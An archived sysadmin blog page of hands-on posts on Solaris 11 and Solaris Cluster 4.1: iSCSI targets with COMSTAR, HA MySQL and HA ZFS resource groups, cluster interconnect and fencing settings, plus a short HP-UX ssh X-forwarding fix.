Archive for 'Sok Tau' Category
Solaris COMSTAR – iSCSI

  ozzie / 02/07/2013
# pkg install group/feature/storage-server
           Packages to install:  47
       Create boot environment:  No
Create backup boot environment: Yes
            Services to change:   3
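
The logical units below are backed by ZFS volumes, which have to exist first. A minimal sketch of creating them (the zpool name iSCSI is taken from the device paths; 30G matches the 32212254720-byte size shown in the list-lu output):

root@iSCSI-ZFS1:~# zfs create -V 30g iSCSI/disk0
root@iSCSI-ZFS1:~# zfs create -V 30g iSCSI/disk1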
 
root@iSCSI-ZFS1:~# stmfadm   create-lu /dev/zvol/rdsk/iSCSI/disk0
Logical unit created: 600144F000144FFB295351DFFBB20001
root@iSCSI-ZFS1:~# stmfadm   create-lu /dev/zvol/rdsk/iSCSI/disk1
Logical unit created: 600144F000144FFB295351DFFBB80002
 
 
 
root@iSCSI-ZFS1:~# stmfadm list-lu -v
LU Name: 600144F000144FFB295351DFFBB20001
    Operational Status     : Online
    Provider Name          : sbd
    Alias                  : /dev/zvol/rdsk/iSCSI/disk0
    View Entry Count       : 0
    Data File              : /dev/zvol/rdsk/iSCSI/disk0
    Meta File              : not set
    Size                   : 32212254720
    Block Size             : 512
    Management URL         : not set
    Vendor ID              : SUN     
    Product ID             : COMSTAR         
    Serial Num             : not set
    Write Protect          : Disabled
    Write Cache Mode Select: Enabled
    Writeback Cache        : Enabled
    Access State           : Active
LU Name: 600144F000144FFB295351DFFBB80002
    Operational Status     : Online
    Provider Name          : sbd
    Alias                  : /dev/zvol/rdsk/iSCSI/disk1
    View Entry Count       : 0
    Data File              : /dev/zvol/rdsk/iSCSI/disk1
    Meta File              : not set
    Size                   : 32212254720
    Block Size             : 512
    Management URL         : not set
    Vendor ID              : SUN     
    Product ID             : COMSTAR         
    Serial Num             : not set
    Write Protect          : Disabled
    Write Cache Mode Select: Enabled
    Writeback Cache        : Enabled
    Access State           : Active
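
Both LUs still show View Entry Count: 0, so no initiator can see them yet. The usual next COMSTAR steps, not captured above, would look roughly like this (a hedged sketch):

root@iSCSI-ZFS1:~# svcadm enable -r svc:/network/iscsi/target:default
root@iSCSI-ZFS1:~# itadm create-target
root@iSCSI-ZFS1:~# stmfadm add-view 600144F000144FFB295351DFFBB20001
root@iSCSI-ZFS1:~# stmfadm add-view 600144F000144FFB295351DFFBB80002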


Monitoring MySQL Enterprise

  ozzie / 27/06/2013

MySQL HA – Solaris Cluster

  ozzie / 27/06/2013

Building MySQL HA Enterprise on the Solaris Clusters kandang-monyet & kandang-buaya…
Since the MySQL Data Service is not yet included in Solaris Cluster, it has to be registered manually…

  *** Data Services Menu ***
    Please select from one of the following options:
 
      * 1) Apache Web Server
      * 2) Oracle
      * 3) NFS
      * 4) Oracle Real Application Clusters
      * 5) PeopleSoft Enterprise Application Server
      * 6) Highly Available Storage
      * 7) Logical Hostname
      * 8) Shared Address
      * 9) Per Node Logical Hostname
      *10) Weblogic Server
 
      * ?) Help
      * q) Return to the Main Menu
    Option:

Register the Generic Data Service and HAStoragePlus resource types:

# clresourcetype register  SUNW.gds SUNW.HAStoragePlus
# clresourcetype  show
=== Registered Resource Types ===   
....
....
Resource Type:                                  SUNW.gds:6
  RT_description:                                  Generic Data Service for Oracle Solaris Cluster
  RT_version:                                      6
  API_version:                                     2
  RT_basedir:                                      /opt/SUNWscgds/bin
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         <NULL>
  RT_system:                                       False
  Global_zone:                                     False
 
Resource Type:                                  SUNW.HAStoragePlus:10
  RT_description:                                  HA Storage Plus
  RT_version:                                      10
  API_version:                                     2
  RT_basedir:                                      /usr/cluster/lib/rgm/rt/hastorageplus
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         SUNWscu
  RT_system:                                       False
  Global_zone:                                     True
.....

Create the resource group and logical hostname for failover:

# clresourcegroup create MySQL-RG
# clresource create -g MySQL-RG -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p Zpools=zMysql -p ZpoolsSearchDir=/dev/did/dsk MySQL-HAS
# clreslogicalhostname create -g MySQL-RG -h buaya  MySQL-LH 
# clresource list -v
Resource Name       Resource Type            Resource Group
-------------       -------------            --------------
MySQL-LH            SUNW.LogicalHostname:4   MySQL-RG
MySQL-HAS           SUNW.HAStoragePlus:10    MySQL-RG

Manual registration:
set the parameters to match the configuration & register…

# cp /opt/SUNWscmys/util/mysql_config /export/home/ozzie/mysql_config
# cp /opt/SUNWscmys/util/ha_mysql_config /export/home/ozzie/ha_mysql_config

mysql_config:

MYSQL_BASE=/opt/mysql/mysql
MYSQL_USER=root
MYSQL_PASSWD=baueek
MYSQL_HOST=Buaya
FMUSER=fmuser
FMPASS=fmuser
MYSQL_SOCK=/tmp/mysql.sock
MYSQL_NIC_HOSTNAME=Buaya
MYSQL_DATADIR=/global/mysql

ha_mysql_config:

 
RS=MySQL-RS
RG=MySQL-RG
PORT=3306
LH=buaya
SCALABLE=
LB_POLICY=
RS_PROP=
HAS_RS=MySQL-HAS
 
BASEDIR=/opt/mysql/mysql
DATADIR=/global/mysql
MYSQLUSER=mysql
MYSQLHOST=buaya
FMUSER=fmuser
FMPASS=fmuser
LOGDIR=/global/mysql/logs
CHECK=yes

Register the Data Service:

# /opt/SUNWscmys/util/mysql_register -f /export/home/ozzie/mysql_config  
# /opt/SUNWscmys/util/ha_mysql_register -f /export/home/ozzie/ha_mysql_config  
# clrs enable MySQL-RS

Taddaaaaa <:-p

bash-3.2# clrs status
 
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            buaya2         Online       Online - Service is online.
                    buaya1         Offline      Offline
 
MySQL-LH            buaya2         Online       Online - LogicalHostname online.
                    buaya1         Offline      Offline
 
MySQL-HAS           buaya2         Online       Online
                    buaya1         Offline      Offline

Now it's just a matter of switching between nodes #:-s
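
For example, failing the group over to the standby node shown above is a one-liner:

# clresourcegroup switch -n buaya1 MySQL-RG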

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 84
Server version: 5.6.12-enterprise-commercial-advanced-log MySQL Enterprise Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>



Shut down all the nodes.

root@Monyet3:~# scshutdown 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:42:38...
 The cluster kandang-monyet will be shutdown in  1 minute
 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:43:08...
 The cluster kandang-monyet will be shutdown in  30 seconds
 
Do you want to continue? (y or n):   y

Since these are SPARC machines, just add the option at the OK prompt…

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2012, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.b, 4096 MB memory available, Serial #83382360.
Ethernet address 0:14:4f:f8:50:58, Host ID: 84f85058.
 
 
 
{0} ok boot -x
Boot device: /virtual-devices@100/channel-devices@200/disk@0:a  File and args: -x
SunOS Release 5.11 Version 11.1 64-bit
Copyright (c) 1983, 2012, Oracle and/or its affiliates. All rights reserved.
\

Then execute clsetup:

  *** Main Menu ***
 
    Select from one of the following options:
 
        1) Change Network Addressing and Ranges for the Cluster Transport
        2) Show Network Addressing and Ranges for the Cluster Transport
 
        ?) Help with menu options
        q) Quit
 
    Option:

  >>> Change Network Addressing and Ranges for the Cluster Transport <<<
 
    Network addressing for the cluster transport is currently configured 
    as follows:
 
 
=== Private Network ===                        
 
private_netaddr:                                172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
 
    Do you want to change this configuration (yes/no) [yes]?  
 
    The default network address for the cluster transport is 172.16.0.0.
 
    Do you want to use the default (yes/no) [yes]?  no
 
    What network address do you want to use?  172.16.202.0
 
    The combination of private netmask and network address will dictate 
    both the maximum number of nodes and private networks that can be 
    supported by a cluster. Given your private network address, this 
    program will generate a range of recommended private netmasks based on
    the maximum number of nodes and private networks that you anticipate 
    for this cluster.
 
    In specifying the anticipated number of maximum nodes and private 
    networks for this cluster, it is important that you give serious 
    consideration to future growth potential. While both the private 
    netmask and network address can be changed later, the tools for making
    such changes require that all nodes in the cluster be booted into 
    noncluster mode.
 
    Maximum number of nodes anticipated for future growth [3]?  
    Maximum number of private networks anticipated for future growth [2]?  
 
    Specify a netmask of 255.255.254.0 to meet anticipated future 
    requirements of 3 cluster nodes and 2 private networks.
 
    To accommodate more growth, specify a netmask of 255.255.254.0 to 
    support up to 6 cluster nodes and 4 private networks.
 
    What netmask do you want to use [255.255.254.0]?  
 
    Is it okay to proceed with the update (yes/no) [yes]?  
 
/usr/cluster/bin/cluster set-netprops -p private_netaddr=172.16.202.0 -p private_netmask=255.255.254.0 -p max_nodes=3 -p max_privatenets=2
Attempting to contact node "Monyet3" ...done
Attempting to contact node "Monyet2" ...done
 
    Command completed successfully.

Just reboot and taadddaaaaa.. 8-}

root@Monyet1:~# clinterconnect show
 
=== Transport Cables ===                       
 
Transport Cable:                                Monyet3:net0,switch1@1
  Endpoint1:                                       Monyet3:net0
  Endpoint2:                                       switch1@1
  State:                                           Enabled
 
Transport Cable:                                Monyet3:net2,switch2@1
  Endpoint1:                                       Monyet3:net2
  Endpoint2:                                       switch2@1
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net0,switch1@2
  Endpoint1:                                       Monyet2:net0
  Endpoint2:                                       switch1@2
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net2,switch2@2
  Endpoint1:                                       Monyet2:net2
  Endpoint2:                                       switch2@2
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net0,switch1@3
  Endpoint1:                                       Monyet1:net0
  Endpoint2:                                       switch1@3
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net2,switch2@3
  Endpoint1:                                       Monyet1:net2
  Endpoint2:                                       switch2@3
  State:                                           Enabled
 
 
=== Transport Switches ===                     
 
Transport Switch:                               switch1
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
Transport Switch:                               switch2
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
 
--- Transport Adapters for Monyet3 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.17
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.9
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet2 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.18
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.10
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet1 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.19
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.11
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled


HA storage ZFS

  ozzie / 23/06/2013

A simulation of high-availability storage with a 3-node Solaris Cluster and iSCSI, on Solaris 11 & Solaris Cluster 4.1.


Once Solaris Cluster is up…

root@Monyet1:~# cluster show -t global
=== Cluster ===                                
Cluster Name:                                   kandang-monyet
  clusterid:                                       0x51C6CA70
  installmode:                                     disabled
  heartbeat_timeout:                               10000
  heartbeat_quantum:                               1000
  private_netaddr:                                 172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
  udp_session_timeout:                             480
  concentrate_load:                                False
  resource_security:                               SECURE
  global_fencing:                                  prefer3
  Node List:                                       Monyet3, Monyet2, Monyet1
 
root@Monyet1:~# clnode status
=== Cluster Nodes ===
--- Node Status ---
 
Node Name                                       Status
---------                                       ------
Monyet3                                         Online
Monyet2                                         Online
Monyet1                                         Online

Add quorum disk device

root@Monyet1:~# cldevice status
=== Cluster DID Devices ===
Device Instance              Node               Status
---------------              ----               ------
/dev/did/rdsk/d1             Monyet3            Unmonitored
 
/dev/did/rdsk/d2             Monyet1            Ok
                             Monyet2            Ok
                             Monyet3            Ok
 
/dev/did/rdsk/d3             Monyet2            Unmonitored
 
/dev/did/rdsk/d5             Monyet1            Unmonitored
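
The actual add step is not in the capture above; on the shared disk d2 it would be (a minimal sketch):

root@Monyet1:~# clquorum add d2
root@Monyet1:~# clquorum status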

Enable automatic node reboot if all monitored disk paths fail:

root@Monyet1:~# clnode set -p reboot_on_path_failure=enabled +
 
root@Monyet1:~# clnode show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Monyet3
  Node ID:                                         1
  Enabled:                                         yes
  privatehostname:                                 clusternode1-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000001
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet2
  Node ID:                                         2
  Enabled:                                         yes
  privatehostname:                                 clusternode2-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000002
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet1
  Node ID:                                         3
  Enabled:                                         yes
  privatehostname:                                 clusternode3-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000003
  Transport Adapter List:                          net0, net2

Registering the cluster storage & network resource types:

root@Monyet1:~# clresourcetype register SUNW.gds SUNW.HAStoragePlus



Create a resource group for the Monyet nodes:

root@Monyet1:~# clresourcegroup create -n Monyet1,Monyet2,Monyet3 RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Unmanaged
                 Monyet2         No             Unmanaged
                 Monyet3         No             Unmanaged
 
root@Monyet1:~# clresourcegroup manage RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Offline
                 Monyet2         No             Offline
                 Monyet3         No             Offline



Create the ZFS pool for storing movies – ‘poolBOKEP’ – before adding it to the cluster resources:

root@Monyet1:~# echo | format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
       0. c2d0 <SUN-Disk-40GB cyl 1135 alt 2 hd 96 sec 768>
          /virtual-devices@100/channel-devices@200/disk@0
       1. c3t0d0 <iSCSI Disk-0123 cyl 19455 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2013-03.org.kebonbinatang.storage1%3Adisk00001,0
Specify disk (enter its number): Specify disk (enter its number): 
 
root@Monyet1:~# zpool  create poolBOKEP c3t0d0
root@Monyet1:~# zpool export poolBOKEP



Add ‘poolBOKEP’ to the resource group RG-MONYET:

root@Monyet1:~# clresource create -g RG-MONYET -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p Zpools=poolBOKEP -p ZpoolsSearchDir=/dev/did/dsk RS-BOKEP-HAS
root@Monyet1:~# clresource list
RS-BOKEP-HAS
root@Monyet1:~# clresource show
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

Import the poolBOKEP created earlier:

root@Monyet1:~#  zpool import poolBOKEP

Add a virtual IP resource to the resource group RG-MONYET:

root@Monyet1:~# clreslogicalhostname create -g RG-MONYET -h Monyet -N  \
sc_ipmp0@Monyet1,sc_ipmp0@Monyet2,sc_ipmp0@Monyet3 RS-MONYET
 
root@Monyet1:~# clresource list
RS-MONYET
RS-BOKEP-HAS
root@Monyet1:~# clresource show
 
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True
 
Resource:                                       RS-MONYET
  Type:                                            SUNW.LogicalHostname:4
  Type_version:                                    4
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

From here it's just a matter of moving the resource group between the other Monyet nodes ;)) [failover]

root@Monyet1:~# clresourcegroup switch -n Monyet3 RG-MONYET

or, to move it back to its preferred node :-??

root@Monyet1:~#  clresourcegroup remaster RG-MONYET

Now just fill poolBOKEP with movies \:d/

root@Monyet3:~# scstat 
------------------------------------------------------------------
 
-- Cluster Nodes --
 
                    Node name           Status
                    ---------           ------
  Cluster node:     Monyet3             Online
  Cluster node:     Monyet2             Online
  Cluster node:     Monyet1             Online
 
------------------------------------------------------------------
 
-- Cluster Transport Paths --
 
                    Endpoint               Endpoint               Status
                    --------               --------               ------
  Transport path:   Monyet3:net2           Monyet2:net2           Path online
  Transport path:   Monyet3:net0           Monyet2:net0           Path online
  Transport path:   Monyet3:net2           Monyet1:net2           Path online
  Transport path:   Monyet3:net0           Monyet1:net0           Path online
  Transport path:   Monyet2:net2           Monyet1:net2           Path online
  Transport path:   Monyet2:net0           Monyet1:net0           Path online
 
------------------------------------------------------------------
 
-- Quorum Summary from latest node reconfiguration --
 
  Quorum votes possible:      5
  Quorum votes needed:        3
  Quorum votes present:       5
 
 
-- Quorum Votes by Node (current status) --
 
                    Node Name           Present Possible Status
                    ---------           ------- -------- ------
  Node votes:       Monyet3             1        1       Online
  Node votes:       Monyet2             1        1       Online
  Node votes:       Monyet1             1        1       Online
 
 
-- Quorum Votes by Device (current status) --
 
                    Device Name         Present Possible Status
                    -----------         ------- -------- ------
  Device votes:     /dev/did/rdsk/d2s2  2        2       Online
 
------------------------------------------------------------------
 
-- Device Group Servers --
 
                         Device Group        Primary             Secondary
                         ------------        -------             ---------
 
 
-- Device Group Status --
 
                              Device Group        Status              
                              ------------        ------              
 
 
-- Multi-owner Device Groups --
 
                              Device Group        Online Status
                              ------------        -------------
 
------------------------------------------------------------------
 
-- Resource Groups and Resources --
 
            Group Name     Resources
            ----------     ---------
 Resources: RG-MONYET      RS-BOKEP-HAS RS-MONYET
 
 
-- Resource Groups --
 
            Group Name     Node Name                State          Suspended
            ----------     ---------                -----          ---------
     Group: RG-MONYET      Monyet1                  Offline        No
     Group: RG-MONYET      Monyet2                  Online         No
     Group: RG-MONYET      Monyet3                  Offline        No
 
 
-- Resources --
 
            Resource Name  Node Name                State          Status Message
            -------------  ---------                -----          --------------
  Resource: RS-BOKEP-HAS   Monyet1                  Offline        Offline
  Resource: RS-BOKEP-HAS   Monyet2                  Online         Online
  Resource: RS-BOKEP-HAS   Monyet3                  Offline        Offline
 
  Resource: RS-MONYET      Monyet1                  Offline        Offline - LogicalHostname offline.
  Resource: RS-MONYET      Monyet2                  Online         Online - LogicalHostname online.
  Resource: RS-MONYET      Monyet3                  Offline        Offline
 
------------------------------------------------------------------
 
-- IPMP Groups --
 
              Node Name           Group   Status         Adapter   Status
              ---------           -----   ------         -------   ------
  IPMP Group: Monyet3             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet2             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet1             sc_ipmp0 Online         net1      Online
 
------------------------------------------------------------------


Disable fencing for the shared-storage device

  ozzie / 23/06/2013

Since iSCSI is used as shared storage for all the Buaya nodes ;))

# echo | format
Searching for disks...done
 
AVAILABLE DISK SELECTIONS:
       0. c1t0d0 <HITACHI-H103014SCSUN146G-A160-136.73GB>
          /pci@0/pci@0/pci@2/scsi@0/sd@0,0
       1. c2t2d0 <iSCSIDisk-0123 cyl 6524 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2011-03.org.kebonbinatang.storage2%3Adisk20001,0
       2. c2t3d0 <iSCSIDisk-0123 cyl 6524 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2011-03.org.kebonbinatang.storage2%3Adisk20001,1
Specify disk (enter its number): Specify disk (enter its number):

# clq show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Buaya1
  Node ID:                                         1
  Quorum Vote Count:                               1
  Reservation Key:                                 0x51C625D900000001
 
Node Name:                                      Buaya2
  Node ID:                                         2
  Quorum Vote Count:                               1
  Reservation Key:                                 0x51C625D900000002
 
 
=== Quorum Devices ===                         
 
Quorum Device Name:                             d2
  Enabled:                                         yes
  Votes:                                           1
  Global Name:                                     /dev/did/rdsk/d2s2
  Type:                                            shared_disk
  Access Mode:                                     scsi2
  Hosts (enabled):                                 Buaya1, Buaya2

# cldevice show
 
=== DID Device Instances ===                   
 
DID Device Name:                                /dev/did/rdsk/d1
  Full Device Path:                                Buaya2:/dev/rdsk/c2t3d0
  Full Device Path:                                Buaya1:/dev/rdsk/c2t3d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d2
  Full Device Path:                                Buaya1:/dev/rdsk/c2t2d0
  Full Device Path:                                Buaya2:/dev/rdsk/c2t2d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d3
  Full Device Path:                                Buaya1:/dev/rdsk/c1t0d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d4
  Full Device Path:                                Buaya2:/dev/rdsk/c1t0d0
  Replication:                                     none
  default_fencing:                                 global



Disable fencing on the shared device d2:

# cldevice set  -p default_fencing=nofencing-noscrub d2
#
# cldevice show       
 
=== DID Device Instances ===                   
.....
.....
DID Device Name:                                /dev/did/rdsk/d2
  Full Device Path:                                Buaya1:/dev/rdsk/c2t2d0
  Full Device Path:                                Buaya2:/dev/rdsk/c2t2d0
  Replication:                                     none
  default_fencing:                                 nofencing
 
.....
.....


Solaris Cluster

  ozzie / 21/06/2013


Download Oracle Solaris Cluster 4.1. This time the base OS is Solaris 11 with IPS.

 

Mount the source repository and refresh its IPS publisher:

# mount -F hsfs /export/home/ozzie/osc-4_1-ga-repo-full.iso  /mnt/
# pkg publisher
PUBLISHER                   TYPE     STATUS P LOCATION
solaris                     origin   online F http://pkg.oracle.com/solaris/release/
 
# pkg set-publisher -G "*" -g file:///mnt/repo ha-cluster
# pkg refresh
# pkg publisher
PUBLISHER                   TYPE     STATUS P LOCATION
ha-cluster                  origin   online F file:///mnt/repo/
solaris                     origin   online F http://pkg.oracle.com/solaris/release/
 
# pkg install ha-cluster-framework-full
           Packages to install:  26
       Create boot environment:  No
Create backup boot environment: Yes
            Services to change:   6
 
DOWNLOAD                                PKGS         FILES    XFER (MB)   SPEED
Completed                              26/26     2794/2794    27.5/27.5    0B/s
 
PHASE                                          ITEMS
Installing new actions                     3936/3936
Updating package state database                 Done 
Updating image state                            Done 
Creating fast lookup database                   Done

Create the cluster with /usr/cluster/bin/scinstall:

 
  *** Main Menu ***
 
    Please select from one of the following (*) options:
 
      * 1) Create a new cluster or add a cluster node
        2) Upgrade this cluster node
        3) Manage a dual-partition upgrade
      * 4) Print release information for this cluster node
 
      * ?) Help with menu options
      * q) Quit
 
    Option:  1
 
 
  *** New Cluster and Cluster Node Menu ***
 
    Please select from any one of the following options:
 
        1) Create a new cluster
        2) Create just the first node of a new cluster on this machine
        3) Add this machine as a node in an existing cluster
 
        ?) Help with menu options
        q) Return to the Main Menu
 
    Option:

  >>> Cluster Name <<<
 
    Each cluster has a name assigned to it. The name can be made up of any
    characters other than whitespace. Each cluster name should be unique 
    within the namespace of your enterprise.
 
    What is the name of the cluster you want to establish?  Kandang-Monyet
 
 
  >>> Check <<<
 
    This step allows you to run cluster check to verify that certain basic
    hardware and software pre-configuration requirements have been met. If
    cluster check detects potential problems with configuring this machine
    as a cluster node, a report of violated checks is prepared and 
    available for display on the screen.
 
    Do you want to run cluster check (yes/no) [yes]?  
 
 
 
  >>> Cluster Nodes <<<
 
    This Oracle Solaris Cluster release supports a total of up to 16 
    nodes.
 
    List the names of the other nodes planned for the initial cluster 
    configuration. List one node name per line. When finished, type 
    Control-D:
 
    Node name (Control-D to finish):  Monyet1
    Node name (Control-D to finish):  Monyet2
    Node name (Control-D to finish):  Monyet3
    Node name (Control-D to finish):  ^D
 
 
 
  >>> Cluster Transport Adapters and Cables <<<
 
    Transport adapters are the adapters that attach to the private cluster
    interconnect.
 
    Select the first cluster transport adapter:
 
        1) net0
        2) net2
        3) Other
 
    Option:  1
 
    Searching for any unexpected network traffic on "net0" ... done
Unexpected network traffic was seen on "net0".
"net0" may be cabled to a public network.
 
    Do you want to use "net0" anyway (yes/no) [no]?  yes
 
    Select the second cluster transport adapter:
 
        1) net0
        2) net2
        3) Other
 
    Option:  2
 
    Searching for any unexpected network traffic on "net2" ... done
Unexpected network traffic was seen on "net2".
"net2" may be cabled to a public network.
 
    Do you want to use "net2" anyway (yes/no) [no]?  
 
 
 
  >>> Confirmation <<<
 
    Your responses indicate the following options to scinstall:
 
      scinstall -i \ 
           -C kandang-monyet \ 
           -F \ 
           -G lofi \ 
           -T node=Monyet1,node=Monyet2,authtype=sys \ 
           -w netaddr=172.16.0.0,netmask=255.255.240.0,maxnodes=32,maxprivatenets=10,numvirtualclusters=12,numxipvirtualclusters=3 \ 
           -A trtype=dlpi,name=net0 -A trtype=dlpi,name=net2 \ 
           -B type=switch,name=switch1 -B type=switch,name=switch2 \ 
           -m endpoint=:net0,endpoint=switch1 \ 
           -m endpoint=:net2,endpoint=switch2 \ 
           -P task=security,state=SECURE
 
    Are these the options you want to use (yes/no) [yes]?  
 
    Do you want to continue with this configuration step (yes/no) [yes]?  
 
 
Initializing cluster name to "kandang-monyet" ... done
Initializing authentication options ... done
Initializing configuration for adapter "net0" ... done
Initializing configuration for adapter "net2" ... done
Initializing configuration for switch "switch1" ... done
Initializing configuration for switch "switch2" ... done
Initializing configuration for cable ... done
Initializing configuration for cable ... done
Initializing private network address options ... done
 
 
Setting the node ID for "Monyet1" ... done (id=1)


ssh X-Forward – HPUX

  ozzie / 16/06/2013

just reminder :D

When the ssh X-Forwarding configuration on an HP-UX machine is already correct, these errors still appear:
Error: Can't open display:
Error: Couldn't find per display information

meanwhile / supposing / what if you want to run an application that needs a GUI.. #:-s

 

# echo "hosts: files dns" > /etc/nsswitch.conf

Trivial, really… 8-} but better than panicking? =))



Pre-Requisites:

  • Oracle Database 11g
  • Oracle Business Intelligence
  • Repository Creation Utility (RCU) tools
  • the nls_length_semantics parameter on the database must be set to BYTE (CHAR is not supported)
  • UTF-8
  • enable X Forwarding via SSH
    edit /etc/ssh/sshd_config

    # X11 tunneling options
    X11Forwarding yes
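
    After editing, restart sshd and reconnect with X forwarding requested (a hedged sketch; on HP-UX the Secure Shell startup script is typically /sbin/init.d/secsh):

    # /sbin/init.d/secsh stop && /sbin/init.d/secsh start
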